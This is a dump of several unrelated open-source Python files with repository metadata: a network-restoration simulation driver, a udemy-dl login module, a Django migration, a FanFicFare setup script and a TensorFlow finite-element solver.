"JUDGMENT_TYPE":judge_types, "RES_ALLOC_TYPE":auction_type,
"VALUATION_TYPE":valuation_type}
dindputils.run_judgment_call(params, save_jc_model=True, print_cmd=False)
for jt, rst, vt in itertools.product(judge_types, auction_type, valuation_type):
print('\n\nPlot restoration plan by JC',jt,rst,vt)
if rst == 'UNIFORM':
indp.plot_indp_sample(params, folderSuffix='_'+jt+'_'+rst, suffix="real")
else:
indp.plot_indp_sample(params, folderSuffix='_'+jt+'_AUCTION_'+rst+'_'+vt, suffix="real")
plt.show()
def run_game_sample(layers, judge_types, auction_type, valuation_type,
game_type="NORMALGAME", signals=None, beliefs=None):
interdep_net= indp.initialize_sample_network(layers=layers)
if game_type == "NORMALGAME":
out_dir = '../results/ng_sample_12Node_results'
elif game_type == "BAYESGAME":
out_dir = '../results/bg'+''.join(signals.values())+''.join(beliefs.values())+\
'_sample_12Node_results'
params={"NUM_ITERATIONS":7, "OUTPUT_DIR":out_dir, "V":1+len(layers), "T":1, "L":layers,
"WINDOW_LENGTH":1, "ALGORITHM":game_type, 'EQUIBALG':'enumerate_pure',
"N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0, "JUDGMENT_TYPE":judge_types,
"RES_ALLOC_TYPE":auction_type, "VALUATION_TYPE":valuation_type, 'PAYOFF_DIR':None,
"SIGNALS":signals, "BELIEFS":beliefs}
gameutils.run_game(params, save_results=True, print_cmd=True, save_model=True, plot2D=True)
for jt, rst, vt in itertools.product(judge_types, auction_type, valuation_type):
print('\n\nPlot restoration plan by Game',jt,rst,vt)
if rst == 'UNIFORM':
indp.plot_indp_sample(params, folderSuffix='_'+jt+'_'+rst, suffix="")
else:
indp.plot_indp_sample(params, folderSuffix='_'+jt+'_AUCTION_'+rst+'_'+vt, suffix="")
plt.show()
def run_mh_sample(layers):
interdep_net= indp.initialize_sample_network(layers=layers)
params={"NUM_ITERATIONS":1, "OUTPUT_DIR":'../results/mh_sample_12Node_results',
"V":len(layers), "T":1, "L":layers, "WINDOW_LENGTH":1, "ALGORITHM":"MH",
"N":interdep_net, "MAGNITUDE":0, "SIM_NUMBER":0}
result_mh = mh.run_mh(params, layers=layers, T=params["T"], suffix="", saveModel=True,
print_cmd_line=True)
return result_mh #!!!
# print('\n\nPlot restoration plan by INDP')
# indp.plot_indp_sample(params)
# plt.show()
def run_method(fail_sce_param, v_r, layers, method, judgment_type=None,
res_alloc_type=None, valuation_type=None, output_dir='..', misc =None):
'''
This function runs a given method for different numbers of resources,
and a given judge, auction, and valuation type in the case of JC.
Parameters
----------
fail_sce_param : dict
informaton of damage scenrios.
v_r : float, list of float, or list of lists of floats
number of resources,
if this is a list of floats, each float is interpreted as a different total
number of resources, and indp is run given the total number of resources.
It only works when auction_type != None.
If this is a list of lists of floats, each list is interpreted as fixed upper
bounds on the number of resources each layer can use (same for all time step)..
layers : TYPE
DESCRIPTION.
method : TYPE
DESCRIPTION.
judgment_type : str, optional
Type of Judgments in Judfment Call Method. The default is None.
res_alloc_type : str, optional
Type of resource allocation method for resource allocation. The default is None.
valuation_type : str, optional
Type of valuation in auction. The default is None.
output_dir : str, optional
DESCRIPTION. The default is '..'.
Returns
-------
None. Writes to file
'''
for v in v_r:
if method == 'INDP':
params = {"NUM_ITERATIONS":10, "OUTPUT_DIR":output_dir+'indp_results',
"V":v, "T":1, 'L':layers, "ALGORITHM":"INDP"}
elif method == 'TDINDP':
params = {"OUTPUT_DIR":output_dir+'/tdindp_results', "V":v, "T":10,
'L':layers, "ALGORITHM":"INDP"} # "WINDOW_LENGTH":3,
elif method == 'JC':
params = {"NUM_ITERATIONS":10, "OUTPUT_DIR":output_dir+'jc_results',
"V":v, "T":1, 'L':layers, "ALGORITHM":"JC",
"JUDGMENT_TYPE":judgment_type, "RES_ALLOC_TYPE":res_alloc_type,
"VALUATION_TYPE":valuation_type}
if 'STM' in valuation_type:
params['STM_MODEL_DICT'] = misc['STM_MODEL']
elif method in ['NORMALGAME', 'BAYESGAME']:
if method == "NORMALGAME":
output_dir += 'ng_results'
elif method == "BAYESGAME":
output_dir += 'bg'+''.join(misc['SIGNALS'].values())+\
''.join(misc['BELIEFS'].values())+'_results'
params = {"NUM_ITERATIONS":10, "OUTPUT_DIR":output_dir,
"V":v, "T":1, "L":layers, "ALGORITHM":method,
'EQUIBALG':'enumerate_pure', "JUDGMENT_TYPE":judgment_type,
"RES_ALLOC_TYPE":res_alloc_type, "VALUATION_TYPE":valuation_type}
if misc:
params['PAYOFF_DIR'] = misc['PAYOFF_DIR']
if params['PAYOFF_DIR']:
params['PAYOFF_DIR'] += 'ng_results'
if method == 'BAYESGAME':
params["SIGNALS"] = misc['SIGNALS']
params["BELIEFS"] = misc['BELIEFS']
else:
sys.exit('Wrong method name: '+method)
params['DYNAMIC_PARAMS'] = misc['DYNAMIC_PARAMS']
if misc['DYNAMIC_PARAMS']:
prefix = params['OUTPUT_DIR'].split('/')[-1]
params['OUTPUT_DIR'] = params['OUTPUT_DIR'].replace(prefix,'dp_'+prefix)
batch_run(params, fail_sce_param)
if __name__ == "__main__":
''' Run a toy example for different methods '''
# plt.close('all')
# layers=[1,2]#,3]
# auction_type = ["MCA", "UNIFORM"]#, "MAA", "MDA"
# valuation_type = ["DTC"]
# judge_types = ["OPTIMISTIC"]#"PESSIMISTIC",
# run_indp_sample(layers)
# run_tdindp_sample(layers)
# # run_jc_sample(layers, judge_types, auction_type, valuation_type)
# run_game_sample(layers, judge_types, auction_type, valuation_type, game_type="NORMALGAME")
# run_game_sample(layers, judge_types, auction_type, valuation_type, game_type="BAYESGAME",
# beliefs={1:'U', 2:'U'}, signals={1:'N', 2:'C'})
# result_mh = run_mh_sample(layers) #!!!
# COMBS = []
# OPTIMAL_COMBS = [[0, 0, len(layers), len(layers), 'indp_sample_12Node', 'nan',
# 'nan', 'nan', ''],
# [0, 0, len(layers), len(layers), 'tdindp_sample_12Node', 'nan',
# 'nan', 'nan', '']]
# # for jt, rst, vt in itertools.product(judge_types, auction_type, valuation_type):
# # if rst == 'UNIFORM':
# # COMBS.append([0, 0, len(layers), len(layers), 'jc_sample_12Node', jt, rst, 'nan', 'real'])
# # COMBS.append([0, 0, len(layers), len(layers), 'ng_sample_12Node', jt, rst, 'nan', ''])
# # else:
# # COMBS.append([0, 0, len(layers), len(layers), 'jc_sample_12Node', jt, rst, vt, 'real'])
# # COMBS.append([0, 0, len(layers), len(layers), 'ng_sample_12Node', jt, rst, vt, ''])
# BASE_DF, objs = dindputils.read_results(COMBS, OPTIMAL_COMBS, ['Total'],
# root_result_dir='../results/', deaggregate=True)
# LAMBDA_DF = dindputils.relative_performance(BASE_DF, COMBS, OPTIMAL_COMBS,
# ref_method='indp_sample_12Node', cost_type='Total')
# RES_ALLOC_DF, ALLOC_GAP_DF = dindputils.read_resourcec_allocation(BASE_DF, COMBS, OPTIMAL_COMBS,
# objs, root_result_dir='../results/',
# ref_method='indp_sample_12Node')
# plots.plot_performance_curves(BASE_DF, cost_type='Total', ci=None,
# deaggregate=True, plot_resilience=True)
# plots.plot_relative_performance(LAMBDA_DF, lambda_type='U')
# plots.plot_auction_allocation(RES_ALLOC_DF, ci=None)
# plots.plot_relative_allocation(ALLOC_GAP_DF, distance_type='gap')
''' ^^^ '''
''' Set analysis directories '''
#: The address to the list of scenarios that should be included in the analyses.
FILTER_SCE = 'C:/Users/ht20/Box Sync/Shelby County Database/Damage_scenarios/damagedElements_sliceQuantile_0.95.csv'
# 'C:/Users/ht20/Box Sync/Shelby County Database/damagedElements_sliceQuantile_0.90.csv'
# '../data/damagedElements_sliceQuantile_0.90.csv'
#: The address to the basic (topology, parameters, etc.) information of the network.
BASE_DIR = "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Node_arc_info/"
# "../data/Extended_Shelby_County/"
# 'C:/Users/ht20/Box Sync/Shelby County Database/Node_arc_info/'
# "C:\\Users\\ht20\\Documents\\Files\\Generated_Network_Dataset_v3.1\\"
# "/home/hesam/Desktop/Files/Generated_Network_Dataset_v3.1"
# "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Node_arc_info/"
#: The address to damge scenario data.
DAMAGE_DIR = "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Damage_scenarios/random_disruption/"
# ../data/random_disruption_shelby/"
#"../data/Wu_Damage_scenarios/"
# "C:\\Users\\ht20\\Documents\\Files\\Generated_Network_Dataset_v3.1\\"
# "/home/hesam/Desktop/Files/Generated_Network_Dataset_v3.1"
# 'C:/Users/ht20/Box Sync/Shelby County Database/Damage_scenarios/'
# "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Damage_scenarios/random_disruption/"
#: The address to where output are stored.
OUTPUT_DIR = '../results/'
# '/home/hesam/Desktop/Files/Game_Shelby_County/results_0.9_perc'
# 'C:/Users/ht20/Documents/Files/Auction_Extended_Shelby_County_Data/results/'
#'../results/
# 'C:/Users/ht20/Documents/Files/Auction_synthetic_networks_v3.1/'
# 'C:/Users/ht20/Documents/Files/Shelby_data_paper/results/'
# FAIL_SCE_PARAM['TOPO']+'/results/'
''' Set analysis dictionaries '''
#: Informatiom on the ype of the failure scenario (Andres or Wu)
#: and network dataset (shelby or synthetic)
#: Help:
#: For Andres scenario: sample range: FAIL_SCE_PARAM['SAMPLE_RANGE'],
#: magnitudes: FAIL_SCE_PARAM['MAGS']
#: For Wu scenario: set range: FAIL_SCE_PARAM['SAMPLE_RANGE'],
#: sce range: FAIL_SCE_PARAM['MAGS']
#: For Synthetic nets: sample range: FAIL_SCE_PARAM['SAMPLE_RANGE'],
#: configurations: FAIL_SCE_PARAM['MAGS']
# FAIL_SCE_PARAM = {'TYPE':"WU", 'SAMPLE_RANGE':range(14), 'MAGS':range(2),
# 'FILTER_SCE':FILTER_SCE, 'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
# FAIL_SCE_PARAM = {'TYPE':"ANDRES", 'SAMPLE_RANGE':range(1, 1001), 'MAGS':[6, 7, 8, 9],
# 'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
FAIL_SCE_PARAM = {'TYPE':"random", 'SAMPLE_RANGE':range(0, 100), 'MAGS':range(0, 1),
'FILTER_SCE':None, 'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
# FAIL_SCE_PARAM = {'TYPE':"synthetic", 'SAMPLE_RANGE':range(0, 1), 'MAGS':range(68, 69),
# 'FILTER_SCE':None, 'TOPO':'Grid',
# 'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
# Dynamic parameters dict
# DYNAMIC_PARAMS = None
# DYNAMIC_PARAMS = {'TYPE': 'shelby_adopted', 'RETURN': 'step_function',
# 'DIR': 'C:/Users/ht20/Documents/Files/dynamic_demand/'}
DYNAMIC_PARAMS = {'TYPE': 'incore', 'RETURN': 'step_function', 'TESTBED':'Joplin',
'DIR': "C:/Users/ht20/Documents/GitHub/NIST_testbeds/"}
### Dict contains information about the statistical models approximating INDP
MODEL_DIR = 'C:/Users/ht20/Documents/Files/STAR_models/Shelby_final_all_Rc'
STM_MODEL_DICT = None
# {'num_pred':1, 'model_dir':MODEL_DIR+'/traces', 'param_folder':MODEL_DIR+'/parameters'}
### Directory with objects containing payoff values for games
PAYOFF_DIR = '/home/hesam/Desktop/Files/Game_Shelby_County/results_NE_only_objs/'
# Output and base dir for sythetic database
SYNTH_DIR = None
if FAIL_SCE_PARAM['TYPE'] == 'synthetic':
SYNTH_DIR = BASE_DIR+FAIL_SCE_PARAM['TOPO']+'Networks/'
OUTPUT_DIR += FAIL_SCE_PARAM['TOPO']+'/results/'
''' Set analysis parameters '''
# No restriction on number of resources for each layer
RC = [1]#[4, 8, 12]
# Not necessary for synthetic nets
# [3, 6, 8, 12]
# [[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]# Prescribed for each layer
LAYERS = [1,3]#[1, 2, 3, 4]
# Not necessary for synthetic nets
JUDGE_TYPE = ["PESSIMISTIC", "OPTIMISTIC", "DET-DEMAND"]
#["PESSIMISTIC", "OPTIMISTIC", "DEMAND", "DET-DEMAND", "RANDOM"]
RES_ALLOC_TYPE = ["MCA", 'UNIFORM', 'OPTIMAL']
#["MDA", "MAA", "MCA", 'UNIFORM', 'OPTIMAL']
VAL_TYPE = ['DTC']
#['DTC', 'DTC_uniform', 'MDDN', 'STM', 'DTC-LP']
''' Run different methods '''
# run_method(FAIL_SCE_PARAM, RC, LAYERS, method='INDP', output_dir=OUTPUT_DIR,
# misc = {'DYNAMIC_PARAMS':DYNAMIC_PARAMS_DIR})
# run_method(FAIL_SCE_PARAM, RC, LAYERS, method='TDINDP', output_dir=OUTPUT_DIR,
# misc = {'DYNAMIC_PARAMS':DYNAMIC_PARAMS_DIR})
# # run_method(FAIL_SCE_PARAM, RC, LAYERS, method='JC', judgment_type=JUDGE_TYPE,
# # res_alloc_type=RES_ALLOC_TYPE, valuation_type=VAL_TYPE,
# # output_dir=OUTPUT_DIR, dynamic_params=DYNAMIC_PARAMS_DIR,
# # misc = {'STM_MODEL':STM_MODEL_DICT, 'DYNAMIC_PARAMS':DYNAMIC_PARAMS_DIR})
# run_method(FAIL_SCE_PARAM, RC, LAYERS, method='NORMALGAME', judgment_type=JUDGE_TYPE,
# res_alloc_type=RES_ALLOC_TYPE, valuation_type=VAL_TYPE, output_dir=OUTPUT_DIR,
# misc = {'PAYOFF_DIR':PAYOFF_DIR, 'DYNAMIC_PARAMS':DYNAMIC_PARAMS_DIR})
run_method(FAIL_SCE_PARAM, RC, LAYERS, method='BAYESGAME', judgment_type=JUDGE_TYPE,
res_alloc_type=RES_ALLOC_TYPE, valuation_type=VAL_TYPE, output_dir=OUTPUT_DIR,
misc = {'PAYOFF_DIR':PAYOFF_DIR, 'DYNAMIC_PARAMS':DYNAMIC_PARAMS_DIR,
"SIGNALS":{x:'C' for x in LAYERS}, "BELIEFS":{x:'U' for x in LAYERS}})
''' Post-processing '''
# COST_TYPES = ['Total'] # 'Under Supply', 'Over Supply'
# REF_METHOD = 'indp'
# METHOD_NAMES = ['indp', 'dp_indp'] #'ng', 'jc', 'dp_indp', 'tdindp' ''bgCCCCUUUU'
# COMBS, OPTIMAL_COMBS = dindputils.generate_combinations(FAIL_SCE_PARAM['TYPE'],
# FAIL_SCE_PARAM['MAGS'], FAIL_SCE_PARAM['SAMPLE_RANGE'], LAYERS,
# RC, METHOD_NAMES, JUDGE_TYPE, RES_ALLOC_TYPE, VAL_TYPE,
# list_high_dam_add=FAIL_SCE_PARAM['FILTER_SCE'],
# synthetic_dir=SYNTH_DIR)
# BASE_DF, objs = dindputils.read_results(COMBS, OPTIMAL_COMBS, COST_TYPES,
# root_result_dir=OUTPUT_DIR, deaggregate=False)
# LAMBDA_DF = dindputils.relative_performance(BASE_DF, COMBS, OPTIMAL_COMBS,
# ref_method=REF_METHOD, cost_type=COST_TYPES[0])
# RES_ALLOC_DF, ALLOC_GAP_DF = dindputils.read_resourcec_allocation(BASE_DF, COMBS, OPTIMAL_COMBS,
# objs, root_result_dir=OUTPUT_DIR,
# ref_method=REF_METHOD)
# RUN_TIME_DF = dindputils.read_run_time(COMBS, OPTIMAL_COMBS, objs, root_result_dir=OUTPUT_DIR)
# ANALYZE_NE_DF = gameutils.analyze_NE(objs, COMBS, OPTIMAL_COMBS)
# ''' Save Variables to file '''
# OBJ_LIST = [COMBS, OPTIMAL_COMBS, BASE_DF, METHOD_NAMES, LAMBDA_DF,
# RES_ALLOC_DF, ALLOC_GAP_DF, RUN_TIME_DF, COST_TYPES, ANALYZE_NE_DF]
# ### Saving the objects ###
# with open(OUTPUT_DIR+'postprocess_dicts.pkl', 'wb') as f:
# pickle.dump(OBJ_LIST, f)
''' Plot results '''
plt.close('all')
# ### Getting back the objects ###
# with open(OUTPUT_DIR+'postprocess_dicts.pkl', 'rb') as f:
# [COMBS, OPTIMAL_COMBS, BASE_DF, METHOD_NAMES, LAMBDA_DF, RES_ALLOC_DF,
# ALLOC_GAP_DF, RUN_TIME_DF, COST_TYPE, ANALYZE_NE_DF] = pickle.load(f)
# plots.plot_performance_curves(BASE_DF,
# cost_type='Total', ci=95,
# deaggregate=False, plot_resilience=True)
# plots.plot_seperated_perform_curves(BASE_DF, x='t', y='cost', cost_type='Total',
# ci=95, normalize=False)
# plots.plot_relative_performance(LAMBDA_DF, lambda_type='U')
# plots.plot_auction_allocation(RES_ALLOC_DF, ci=95)
# plots.plot_relative_allocation(ALLOC_GAP_DF, distance_type='gap')
# plots.plot_run_time(RUN_TIME_DF, ci=95)
# plots.plot_ne_analysis(ANALYZE_NE_DF, ci=None)
# plots.plot_ne_cooperation(ANALYZE_NE_DF, ci=None)
# [(RUN_TIME_DF['auction_type']!='MDA')&(RUN_TIME_DF['auction_type']!='MAA')]
# [(BASE_DF['judgment_type']!='PESSIMISTIC')&\
# (BASE_DF['judgment_type']!='DET-DEMAND')&\
# (BASE_DF['decision_type']!='indp')&\
# (BASE_DF['auction_type']!='OPTIMAL')]
| 52.438819
| 120
| 0.613252
|
86ddd7e9d11df4962b845bf14f22f8c39d0e2beb
| 4,845
|
py
|
Python
|
udemy/auth.py
|
p-pavankumar/udemy-dl
|
1222b2d7fe3fc3e6c065e30061b4b4c34d4daa01
|
[
"MIT"
] | null | null | null |
udemy/auth.py
|
p-pavankumar/udemy-dl
|
1222b2d7fe3fc3e6c065e30061b4b4c34d4daa01
|
[
"MIT"
] | null | null | null |
udemy/auth.py
|
p-pavankumar/udemy-dl
|
1222b2d7fe3fc3e6c065e30061b4b4c34d4daa01
|
[
"MIT"
] | null | null | null |
# pylint: disable=R,C
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author : Nasir Khan (r0ot h3x49)
Github : https://github.com/r0oth3x49
License : MIT
Copyright (c) 2018-2025 Nasir Khan (r0ot h3x49)
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the
Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH
THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from udemy.compat import conn_error, LOGIN_URL, cloudscraper
from udemy.logger import logger
from udemy.session import Session
from udemy.utils import (
search_regex,
hidden_inputs,
to_configs,
load_configs,
extract_cookie_string,
)
class UdemyAuth(object):
def __init__(self, username="", password=""):
self.username = username
self.password = password
self._session = Session()
self._cloudsc = cloudscraper.create_scraper()
def _form_hidden_input(self, form_id):
try:
resp = self._cloudsc.get(LOGIN_URL) # pylint: disable=W
resp.raise_for_status()
webpage = resp.text
except conn_error as error:
raise error
else:
login_form = hidden_inputs(
search_regex(
r'(?is)<form[^>]+?id=(["\'])%s\1[^>]*>(?P<form>.+?)</form>'
% form_id,
webpage,
"%s form" % form_id,
group="form",
)
)
login_form.update({"email": self.username, "password": self.password})
return login_form
def is_session_exists(self):
is_exists = False
conf = load_configs()
if conf:
cookies = conf.get("cookies")
if cookies:
cookies = extract_cookie_string(cookies)
access_token = cookies.get("access_token")
client_id = cookies.get("client_id")
self._session._set_auth_headers( # pylint: disable=W
access_token=access_token, client_id=client_id
)
self._session._session.cookies.update( # pylint: disable=W
{"access_token": access_token}
)
try:
url = "https://www.udemy.com/api-2.0/courses/"
resp = self._session._get(url) # pylint: disable=W
resp.raise_for_status()
is_exists = True
except Exception as error: # pylint: disable=W
logger.error(
msg=f"Udemy Says: {error} session cookie seems to be expired..."
)
is_exists = False
return is_exists, conf
def authenticate(self, access_token="", client_id=""):
if not access_token and not client_id:
data = self._form_hidden_input(form_id="login-form")
self._cloudsc.headers.update({"Referer": LOGIN_URL})
auth_response = self._cloudsc.post( # pylint: disable=W
LOGIN_URL, data=data, allow_redirects=False
) # pylint: disable=W
auth_cookies = auth_response.cookies
access_token = auth_cookies.get("access_token", "")
client_id = auth_cookies.get("client_id", "")
if access_token:
# dump cookies to configs
# _ = to_configs(
# username=self.username,
# password=self.password,
# cookies=f"access_token={access_token}",
# )
self._session._set_auth_headers( # pylint: disable=W
access_token=access_token, client_id=client_id
)
self._session._session.cookies.update( # pylint: disable=W
{"access_token": access_token}
)
return self._session, access_token
else:
self._session._set_auth_headers() # pylint: disable=W
return None, None
| 40.041322
| 168
| 0.600413
|
05ff1963b3b0975f8c67a103807efcf55b9ac180
| 1,477
|
py
|
Python
|
app/migrations/0001_initial.py
|
marcmelchor/crawl-google-playsotre-reviews
|
a4db1acd6d552583592d0eb640c4dd17cc8eb4ef
|
[
"Apache-2.0"
] | null | null | null |
app/migrations/0001_initial.py
|
marcmelchor/crawl-google-playsotre-reviews
|
a4db1acd6d552583592d0eb640c4dd17cc8eb4ef
|
[
"Apache-2.0"
] | null | null | null |
app/migrations/0001_initial.py
|
marcmelchor/crawl-google-playsotre-reviews
|
a4db1acd6d552583592d0eb640c4dd17cc8eb4ef
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-02-28 09:18
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.manager
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='App',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_id', models.CharField(max_length=250, unique=True)),
],
managers=[
('objects_manager', django.db.models.manager.Manager()),
],
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('review_id', models.CharField(max_length=250)),
('user_name', models.CharField(max_length=250)),
('user_image', models.CharField(max_length=250)),
('content', models.TextField()),
('score', models.IntegerField()),
('thumbs_up_count', models.IntegerField()),
('review_created_version', models.CharField(max_length=10)),
('at', models.DateField()),
('app_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.app')),
],
),
]
| 35.166667
| 114
| 0.562627
|
bf4335dd0ca4485aa6f8f951763c821b614800cb
| 4,496
|
py
|
Python
|
setup.py
|
TheCakeIsNaOH/FanFicFare
|
76565e959a38f9064fd8c7d09456053741598459
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TheCakeIsNaOH/FanFicFare
|
76565e959a38f9064fd8c7d09456053741598459
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TheCakeIsNaOH/FanFicFare
|
76565e959a38f9064fd8c7d09456053741598459
|
[
"Apache-2.0"
] | null | null | null |
"""A setuptools based setup module.
See:
https://packaging.python.org/guides/distributing-packages-using-setuptools/
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup
# To use a consistent encoding
import codecs
package_name="FanFicFare"
import sys
if sys.version_info < (2,7):
sys.exit(package_name+' requires Python 2.7 or newer.')
# Get the long description from the relevant file
with codecs.open('DESCRIPTION.rst', encoding='utf-8') as f:
long_description = f.read()
setup(
name=package_name,
# Versions should comply with PEP440.
version="4.6.0",
description='A tool for downloading fanfiction to eBook formats',
long_description=long_description,
# The project's main homepage.
url='https://github.com/JimmXinu/FanFicFare',
# Author details
author='Jim Miller',
author_email='retiefjimm@gmail.com',
# Choose your license
license='Apache License',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
# Indicate who your project is intended for
'Intended Audience :: End Users/Desktop',
'Topic :: Internet :: WWW/HTTP',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
# Earlier py3 version may work, but I've not tested them.
'Programming Language :: Python :: 3.7',
],
# What does your project relate to?
keywords='fanfiction download ebook epub html',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
# packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
packages=['fanficfare', 'fanficfare.adapters', 'fanficfare.writers',
'fanficfare.browsercache','fanficfare.browsercache.chromagnon'],
# for package_data
package_dir={'fanficfare': 'fanficfare'},
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['beautifulsoup4',
'chardet',
'html5lib',
'html2text',
'cloudscraper', # includes requests and deps.
'urllib3 >= 1.26.2', # for Retry(other=)
'requests >= 2.25.1', # otherwise version issues with urllib3
'requests-file',
'brotli',
'pywin32; platform_system=="Windows"'],
# html5lib requires 'six', FFF includes it's own copy as fanficfare.six
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'image_processing': ['Pillow'],
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'fanficfare': ['defaults.ini', 'example.ini'],
},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'fanficfare=fanficfare.cli:main',
],
},
)
| 35.401575
| 94
| 0.645907
|
9232fa701615d9b5e6c929bbb6afc4790c913cd9
| 1,783
|
py
|
Python
|
codes/projects/poisson_linear_2d/utils_project/solve_fem_poisson_heat_linear_assembled.py
|
hwangoh/uq-vae
|
382548e6f6dd7f9d72feff0e0752beec871db348
|
[
"MIT"
] | 2
|
2021-07-28T16:47:18.000Z
|
2021-08-03T00:53:58.000Z
|
codes/projects/poisson_linear_2d/utils_project/solve_fem_poisson_heat_linear_assembled.py
|
HwanGoh/uq-vae
|
24a3d26987e2ec807d57601b14c68b22f3652a18
|
[
"MIT"
] | null | null | null |
codes/projects/poisson_linear_2d/utils_project/solve_fem_poisson_heat_linear_assembled.py
|
HwanGoh/uq-vae
|
24a3d26987e2ec807d57601b14c68b22f3652a18
|
[
"MIT"
] | 2
|
2021-09-29T08:31:46.000Z
|
2021-11-07T10:26:45.000Z
|
import tensorflow as tf
import numpy as np
import pandas as pd
import time
import pdb #Equivalent of keyboard in MATLAB, just add "pdb.set_trace()"
###############################################################################
# Neumann #
###############################################################################
class SolveFEMPoissonHeatLinearAssembled:
def __init__(self, options, filepaths,
obs_indices,
forward_matrix, mass_matrix,
load_vector):
#=== Defining Attributes ===#
self.options = options
self.filepaths = filepaths
self.obs_indices = tf.cast(obs_indices, tf.int32)
self.forward_matrix = forward_matrix
self.mass_matrix = mass_matrix
self.load_vector = load_vector
def solve_pde(self, parameters):
#=== Solving PDE ===#
rhs = tf.linalg.matmul(
tf.expand_dims(parameters[0,:], axis=0), tf.transpose(self.mass_matrix))\
+ tf.transpose(self.load_vector)
state = tf.linalg.matmul(rhs, tf.transpose(self.forward_matrix))
for n in range(1, parameters.shape[0]):
rhs = tf.linalg.matmul(
tf.expand_dims(parameters[n,:], axis=0), tf.transpose(self.mass_matrix))\
+ tf.transpose(self.load_vector)
solution = tf.linalg.matmul(rhs, tf.transpose(self.forward_matrix))
state = tf.concat([state, solution], axis=0)
#=== Generate Measurement Data ===#
if self.options.obs_type == 'obs':
state_obs = tf.gather(state, self.obs_indices, axis=1)
return tf.squeeze(state_obs)
else:
return state
| 40.522727
| 93
| 0.530566
|
1b7f9e6bec4283e2d924ff9f29f58be4b4b4174f
| 332
|
py
|
Python
|
PBO_18102/tugas_5.1_18102.py
|
mjeiner28/PBO
|
e2885243a576d2ebb61fff66b9f1bf138be98d28
|
[
"MIT"
] | null | null | null |
PBO_18102/tugas_5.1_18102.py
|
mjeiner28/PBO
|
e2885243a576d2ebb61fff66b9f1bf138be98d28
|
[
"MIT"
] | null | null | null |
PBO_18102/tugas_5.1_18102.py
|
mjeiner28/PBO
|
e2885243a576d2ebb61fff66b9f1bf138be98d28
|
[
"MIT"
] | null | null | null |
status = False
batas = 3
tabel_menu =["ayam goreng","nasi kuning","ikan bakar","gohu"]
while batas > 2:
tanya_username = input("masukan pilihan makanan: ")
for a_menu in tabel_menu:
print ("selamat makan")
status = True
break
continue
break
| 23.714286
| 62
| 0.533133
|
09f69b3b96be010a0c7f47cd9b124b103121dab4
| 6,573
|
py
|
Python
|
mezzanine/utils/tests.py
|
UbuntuEvangelist/mezzanine
|
5d3c21f918f26dee7bc107122ca6a1ad247314b2
|
[
"BSD-2-Clause"
] | 1
|
2015-01-20T07:31:12.000Z
|
2015-01-20T07:31:12.000Z
|
mezzanine/utils/tests.py
|
alan-hicks/mezzanine
|
92fa94aa3053f4fda7bcef9b44b96fa1ebbf6860
|
[
"BSD-2-Clause"
] | 9
|
2020-03-24T16:20:31.000Z
|
2022-03-11T23:32:38.000Z
|
mezzanine/utils/tests.py
|
alan-hicks/mezzanine
|
